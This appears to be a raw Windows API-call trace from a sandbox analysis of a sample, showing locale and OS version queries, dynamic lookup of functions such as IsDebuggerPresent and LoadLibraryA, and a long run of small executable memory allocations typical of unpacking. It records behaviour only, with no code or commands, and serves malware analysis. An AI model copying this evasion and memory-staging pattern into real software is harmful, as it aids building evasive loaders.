GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tue") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Tuesday") returned 8 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wed") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Wednesday") returned 10 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thu") returned 4 [0133.151] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Thursday") returned 9 [0133.152] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Fri") returned 4 [0133.152] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Friday") returned 7 [0133.152] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Sat") returned 4 [0133.152] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd04, cchData=256 | out: lpLCData="Saturday") returned 9 [0133.152] GetThreadLocale () returned 0x409 [0133.152] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fd60, cchData=256 | out: lpLCData="$") returned 2 [0133.152] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0133.168] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0133.169] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0133.169] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fe58, cchData=2 | out: lpLCData=".") returned 2 [0133.169] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fd60, cchData=256 | out: lpLCData="2") returned 2 [0133.169] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fe58, cchData=2 | out: lpLCData="/") returned 2 [0133.169] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fd60, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0133.169] GetThreadLocale () returned 0x409 [0133.169] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fd60, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0133.170] GetThreadLocale () returned 0x409 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd30, cchData=256 | out: lpLCData="1") returned 2 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fe58, cchData=2 | out: lpLCData=":") returned 2 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fd60, cchData=256 | out: lpLCData="AM") returned 3 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fd60, cchData=256 | out: lpLCData="PM") returned 3 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fd60, cchData=256 | out: lpLCData="0") returned 2 [0133.170] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fe58, cchData=2 | out: lpLCData=",") returned 2 [0133.170] GetVersionExA (in: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x219030c, dwMinorVersion=0x21902fc, dwBuildNumber=0x30, dwPlatformId=0x21322c9, szCSDVersion="Äþ\x18") | out: lpVersionInformation=0x18fe2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0133.170] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0133.171] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceExA") returned 0x76a448ef [0133.244] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x18fd40 | out: lpWSAData=0x18fd40) returned 0 [0133.380] GetCurrentThreadId () returned 0xeb8 [0133.390] VirtualAlloc (lpAddress=0x2194000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x2194000 [0133.493] GetLocalTime (in: lpSystemTime=0x18feb8 | out: lpSystemTime=0x18feb8*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x17, wMinute=0xa, wSecond=0x16, wMilliseconds=0x182)) [0133.494] GetSystemTime (in: lpSystemTime=0x18feb4 | out: lpSystemTime=0x18feb4*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x16, wMinute=0xa, wSecond=0x16, wMilliseconds=0x182)) [0133.538] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0 [0133.538] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0133.539] GetCurrentProcess () returned 0xffffffff [0133.539] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc | out: lpProcessAffinityMask=0x18ff00, lpSystemAffinityMask=0x18fefc) returned 1 [0133.546] VirtualAlloc (lpAddress=0x21b8000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x21b8000 [0133.560] VirtualFree (lpAddress=0x21d8000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0133.566] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0133.566] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="MapViewOfFile") returned 0x769c18d1 [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceA") returned 0x769de98b [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="UnmapViewOfFile") returned 0x769c1806 [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileMappingA") returned 0x769c54be [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0133.567] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0133.568] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0133.568] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x76c20000 [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0133.568] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0133.569] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0133.569] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x1000, flProtect=0x40) returned 0x1b0000 [0133.569] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x1000, flProtect=0x40) returned 0x240000 [0133.569] VirtualAlloc (lpAddress=0x21d8000, dwSize=0x28000, flAllocationType=0x1000, flProtect=0x4) returned 0x21d8000 [0133.574] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000 [0133.574] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x3d0000 [0133.575] VirtualAlloc (lpAddress=0x0, dwSize=0x83, flAllocationType=0x1000, flProtect=0x40) returned 0x3e0000 [0133.575] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000 [0133.575] VirtualAlloc (lpAddress=0x0, dwSize=0x437, flAllocationType=0x1000, flProtect=0x40) returned 0xaf0000 [0133.575] VirtualAlloc (lpAddress=0x0, dwSize=0x1c9, flAllocationType=0x1000, flProtect=0x40) returned 0xb00000 [0133.576] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0xb10000 [0133.610] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0xb20000 [0133.611] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x20d0000 [0133.611] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x20e0000 [0133.611] VirtualAlloc (lpAddress=0x2200000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2200000 [0133.611] GetCurrentProcessId () returned 0xeb4 [0133.611] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x20f0000 [0133.612] VirtualAlloc (lpAddress=0x0, dwSize=0xbf, flAllocationType=0x1000, flProtect=0x40) returned 0x2100000 [0133.612] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0133.612] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2120000 [0133.612] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x1000, flProtect=0x40) returned 0x2370000 [0133.613] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x23c0000 [0133.613] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x1000, flProtect=0x40) returned 0x23d0000 [0133.613] VirtualAlloc (lpAddress=0x0, dwSize=0xc0, flAllocationType=0x1000, flProtect=0x40) returned 0x23e0000 [0133.613] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x23f0000 [0133.614] VirtualAlloc (lpAddress=0x0, dwSize=0x17c, flAllocationType=0x1000, flProtect=0x40) returned 0x2400000 [0133.614] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2410000 [0133.614] GetCurrentProcessId () returned 0xeb4 [0133.614] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2420000 [0133.614] VirtualAlloc (lpAddress=0x0, dwSize=0x284, flAllocationType=0x1000, flProtect=0x40) returned 0x2430000 [0133.615] VirtualAlloc (lpAddress=0x0, dwSize=0x37d, flAllocationType=0x1000, flProtect=0x40) returned 0x2440000 [0133.615] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x2450000 [0133.615] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x1000, flProtect=0x40) returned 0x2460000 [0133.615] VirtualAlloc (lpAddress=0x0, dwSize=0x91, flAllocationType=0x1000, flProtect=0x40) returned 0x2470000 [0133.616] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2790000 [0133.616] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x27a0000 [0133.616] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x27b0000 [0133.616] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x27c0000 [0133.617] VirtualAlloc (lpAddress=0x0, dwSize=0xb9, flAllocationType=0x1000, flProtect=0x40) returned 0x27d0000 [0133.617] GetCurrentProcessId () returned 0xeb4 [0133.617] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x27e0000 [0133.617] VirtualAlloc (lpAddress=0x0, dwSize=0x149, flAllocationType=0x1000, flProtect=0x40) returned 0x27f0000 [0133.618] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2800000 [0133.618] VirtualAlloc (lpAddress=0x0, dwSize=0x11d, flAllocationType=0x1000, flProtect=0x40) returned 0x2810000 [0133.618] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x1000, flProtect=0x40) returned 0x2820000 [0133.618] VirtualAlloc (lpAddress=0x0, dwSize=0xb7, flAllocationType=0x1000, flProtect=0x40) returned 0x2830000 [0133.619] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2840000 [0133.619] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2850000 [0133.619] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2860000 [0133.619] VirtualAlloc (lpAddress=0x0, dwSize=0x3b1, flAllocationType=0x1000, flProtect=0x40) returned 0x2870000 [0133.620] VirtualAlloc (lpAddress=0x0, dwSize=0xab, flAllocationType=0x1000, flProtect=0x40) returned 0x2880000 [0133.620] GetCurrentProcessId () returned 0xeb4 [0133.620] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2890000 [0133.620] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x28a0000 [0133.621] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x28b0000 [0133.621] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x28c0000 [0133.621] VirtualAlloc (lpAddress=0x0, dwSize=0x1df, flAllocationType=0x1000, flProtect=0x40) returned 0x28d0000 [0133.621] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x28e0000 [0133.622] VirtualAlloc (lpAddress=0x0, dwSize=0x189, flAllocationType=0x1000, flProtect=0x40) returned 0x28f0000 [0133.622] VirtualAlloc (lpAddress=0x0, dwSize=0x483, flAllocationType=0x1000, flProtect=0x40) returned 0x2900000 [0133.622] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2910000 [0133.622] VirtualAlloc (lpAddress=0x0, dwSize=0x247, flAllocationType=0x1000, flProtect=0x40) returned 0x2920000 [0133.623] VirtualAlloc (lpAddress=0x0, dwSize=0xaf, flAllocationType=0x1000, flProtect=0x40) returned 0x2930000 [0133.623] GetCurrentProcessId () returned 0xeb4 [0133.623] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2940000 [0133.624] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x1000, flProtect=0x40) returned 0x2950000 [0133.624] VirtualAlloc (lpAddress=0x0, dwSize=0x89, flAllocationType=0x1000, flProtect=0x40) returned 0x2960000 [0133.624] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2970000 [0133.624] VirtualAlloc (lpAddress=0x0, dwSize=0xa5, flAllocationType=0x1000, flProtect=0x40) returned 0x2980000 [0133.625] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x2990000 [0133.625] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x29a0000 [0133.625] VirtualAlloc (lpAddress=0x0, dwSize=0xcc, flAllocationType=0x1000, flProtect=0x40) returned 0x29b0000 [0133.625] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x1000, flProtect=0x40) returned 0x29c0000 [0133.626] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x29d0000 [0133.626] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x29e0000 [0133.626] VirtualAlloc (lpAddress=0x2204000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2204000 [0133.627] GetCurrentProcessId () returned 0xeb4 [0133.627] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x29f0000 [0133.627] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2a00000 [0133.627] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2a10000 [0133.627] VirtualAlloc (lpAddress=0x0, dwSize=0xa7, flAllocationType=0x1000, flProtect=0x40) returned 0x2a20000 [0133.628] VirtualAlloc (lpAddress=0x0, dwSize=0xc4, flAllocationType=0x1000, flProtect=0x40) returned 0x2a30000 [0133.628] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2a40000 [0133.628] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x1000, flProtect=0x40) returned 0x2a50000 [0133.629] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x1000, flProtect=0x40) returned 0x2a60000 [0133.629] VirtualAlloc (lpAddress=0x0, dwSize=0x17e, flAllocationType=0x1000, flProtect=0x40) returned 0x2a70000 [0133.629] VirtualAlloc (lpAddress=0x0, dwSize=0x1b1, flAllocationType=0x1000, flProtect=0x40) returned 0x2a80000 [0133.629] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2a90000 [0133.630] GetCurrentProcessId () returned 0xeb4 [0133.630] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2aa0000 [0133.630] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x1000, flProtect=0x40) returned 0x2ab0000 [0133.630] VirtualAlloc (lpAddress=0x0, dwSize=0x9b, flAllocationType=0x1000, flProtect=0x40) returned 0x2ac0000 [0133.630] VirtualAlloc (lpAddress=0x0, dwSize=0xbb, flAllocationType=0x1000, flProtect=0x40) returned 0x2ad0000 [0133.631] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae0000 [0133.631] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2af0000 [0133.631] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x1000, flProtect=0x40) returned 0x2b00000 [0133.632] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b10000 [0133.632] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b20000 [0133.632] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x1000, flProtect=0x40) returned 0x2b30000 [0133.633] VirtualAlloc (lpAddress=0x0, dwSize=0x328, flAllocationType=0x1000, flProtect=0x40) returned 0x2b40000 [0133.633] GetCurrentProcessId () returned 0xeb4 [0133.633] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2b50000 [0133.634] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2b60000 [0133.634] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x1000, flProtect=0x40) returned 0x2b70000 [0133.634] VirtualAlloc (lpAddress=0x0, dwSize=0x1a2, flAllocationType=0x1000, flProtect=0x40) returned 0x2b80000 [0133.635] VirtualAlloc (lpAddress=0x0, dwSize=0x8d, flAllocationType=0x1000, flProtect=0x40) returned 0x2b90000 [0133.635] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2ba0000 [0133.635] VirtualAlloc (lpAddress=0x0, dwSize=0x293, flAllocationType=0x1000, flProtect=0x40) returned 0x2bb0000 [0133.636] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2bc0000 [0133.636] VirtualAlloc (lpAddress=0x0, dwSize=0x14f, flAllocationType=0x1000, flProtect=0x40) returned 0x2bd0000 [0133.636] VirtualAlloc (lpAddress=0x0, dwSize=0xc1, flAllocationType=0x1000, flProtect=0x40) returned 0x2be0000 [0133.637] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2bf0000 [0133.637] GetCurrentProcessId () returned 0xeb4 [0133.637] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2c00000 [0133.637] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x1000, flProtect=0x40) returned 0x2c10000 [0133.638] VirtualAlloc (lpAddress=0x0, dwSize=0xb1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c20000 [0133.638] VirtualAlloc (lpAddress=0x0, dwSize=0x1bc, flAllocationType=0x1000, flProtect=0x40) returned 0x2c30000 [0133.638] VirtualAlloc (lpAddress=0x0, dwSize=0x2c1, flAllocationType=0x1000, flProtect=0x40) returned 0x2c40000 [0133.639] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2c50000 [0133.639] VirtualAlloc (lpAddress=0x0, dwSize=0xdd, flAllocationType=0x1000, flProtect=0x40) returned 0x2c60000 [0133.639] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x1000, flProtect=0x40) returned 0x2c70000 [0133.640] VirtualAlloc (lpAddress=0x0, dwSize=0x95, flAllocationType=0x1000, flProtect=0x40) returned 0x2c80000 [0133.640] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x1000, flProtect=0x40) returned 0x2c90000 [0133.640] VirtualAlloc (lpAddress=0x0, dwSize=0xc3, flAllocationType=0x1000, flProtect=0x40) returned 0x2ca0000 [0133.641] VirtualAlloc (lpAddress=0x2208000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2208000 [0133.641] GetCurrentProcessId () returned 0xeb4 [0133.641] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2cb0000 [0133.641] VirtualAlloc (lpAddress=0x0, dwSize=0xc7, flAllocationType=0x1000, flProtect=0x40) returned 0x2cc0000 [0133.642] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2cd0000 [0133.642] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x1000, flProtect=0x40) returned 0x2ce0000 [0133.642] VirtualAlloc (lpAddress=0x0, dwSize=0xad, flAllocationType=0x1000, flProtect=0x40) returned 0x2cf0000 [0133.642] VirtualAlloc (lpAddress=0x0, dwSize=0x272, flAllocationType=0x1000, flProtect=0x40) returned 0x2d00000 [0133.643] VirtualAlloc (lpAddress=0x0, dwSize=0xa3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d10000 [0133.643] VirtualAlloc (lpAddress=0x0, dwSize=0x8f, flAllocationType=0x1000, flProtect=0x40) returned 0x2d20000 [0133.643] VirtualAlloc (lpAddress=0x0, dwSize=0xca, flAllocationType=0x1000, flProtect=0x40) returned 0x2d30000 [0133.644] VirtualAlloc (lpAddress=0x0, dwSize=0xe3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d40000 [0133.644] VirtualAlloc (lpAddress=0x0, dwSize=0x9f, flAllocationType=0x1000, flProtect=0x40) returned 0x2d50000 [0133.644] GetCurrentProcessId () returned 0xeb4 [0133.644] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2d60000 [0133.645] VirtualAlloc (lpAddress=0x0, dwSize=0xb3, flAllocationType=0x1000, flProtect=0x40) returned 0x2d70000 [0133.645] VirtualAlloc (lpAddress=0x0, dwSize=0xe1, flAllocationType=0x1000, flProtect=0x40) returned 0x2d80000 [0133.645] VirtualAlloc (lpAddress=0x0, dwSize=0x7b, flAllocationType=0x1000, flProtect=0x40) returned 0x2d90000 [0133.646] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x1000, flProtect=0x40) returned 0x2da0000 [0133.646] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x1000, flProtect=0x40) returned 0x2db0000 [0133.646] VirtualAlloc (lpAddress=0x0, dwSize=0x399, flAllocationType=0x1000, flProtect=0x40) returned 0x2dc0000 [0133.647] VirtualAlloc (lpAddress=0x0, dwSize=0xa9, flAllocationType=0x1000, flProtect=0x40) returned 0x2dd0000 [0133.647] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x1000, flProtect=0x40) returned 0x2de0000 [0133.647] VirtualAlloc (lpAddress=0x0, dwSize=0x133, flAllocationType=0x1000, flProtect=0x40) returned 0x2df0000 [0133.648] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x1000, flProtect=0x40) returned 0x2e00000 [0133.648] GetCurrentProcessId () returned 0xeb4 [0133.648] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2e10000 [0133.649] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x1000, flProtect=0x40) returned 0x2e20000 [0133.649] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x1000, flProtect=0x40) returned 0x2e30000 [0133.649] VirtualAlloc (lpAddress=0x0, dwSize=0x86, flAllocationType=0x1000, flProtect=0x40) returned 0x2e40000 [0133.650] VirtualAlloc (lpAddress=0x0, dwSize=0x99, flAllocationType=0x1000, flProtect=0x40) returned 0x2e50000 [0133.650] VirtualAlloc (lpAddress=0x0, dwSize=0xa0, flAllocationType=0x1000, flProtect=0x40) returned 0x2e60000 [0133.650] VirtualAlloc (lpAddress=0x0, dwSize=0xa8, flAllocationType=0x1000, flProtect=0x40) returned 0x2e70000 [0133.651] VirtualAlloc (lpAddress=0x0, dwSize=0xd1, flAllocationType=0x1000, flProtect=0x40) returned 0x2e80000 [0133.651] VirtualAlloc (lpAddress=0x0, dwSize=0x87, flAllocationType=0x1000, flProtect=0x40) returned 0x2e90000 [0133.651] VirtualAlloc (lpAddress=0x0, dwSize=0x1af, flAllocationType=0x1000, flProtect=0x40) returned 0x2ea0000 [0133.652] VirtualAlloc (lpAddress=0x0, dwSize=0x9d, flAllocationType=0x1000, flProtect=0x40) returned 0x2eb0000 [0133.652] GetCurrentProcessId () returned 0xeb4 [0133.652] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2ec0000 [0133.653] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x1000, flProtect=0x40) returned 0x2ed0000 [0133.653] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2ee0000 [0133.653] VirtualAlloc (lpAddress=0x0, dwSize=0x65, flAllocationType=0x1000, flProtect=0x40) returned 0x2ef0000 [0133.654] VirtualAlloc (lpAddress=0x0, dwSize=0x3a6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f00000 [0133.655] VirtualAlloc (lpAddress=0x0, dwSize=0x139, flAllocationType=0x1000, flProtect=0x40) returned 0x2f10000 [0133.655] VirtualAlloc (lpAddress=0x0, dwSize=0x388, flAllocationType=0x1000, flProtect=0x40) returned 0x2f20000 [0133.656] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x1000, flProtect=0x40) returned 0x2f30000 [0133.656] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x1000, flProtect=0x40) returned 0x2f40000 [0133.657] VirtualAlloc (lpAddress=0x0, dwSize=0xcb, flAllocationType=0x1000, flProtect=0x40) returned 0x2f50000 [0133.657] VirtualAlloc (lpAddress=0x0, dwSize=0xa1, flAllocationType=0x1000, flProtect=0x40) returned 0x2f60000 [0133.658] 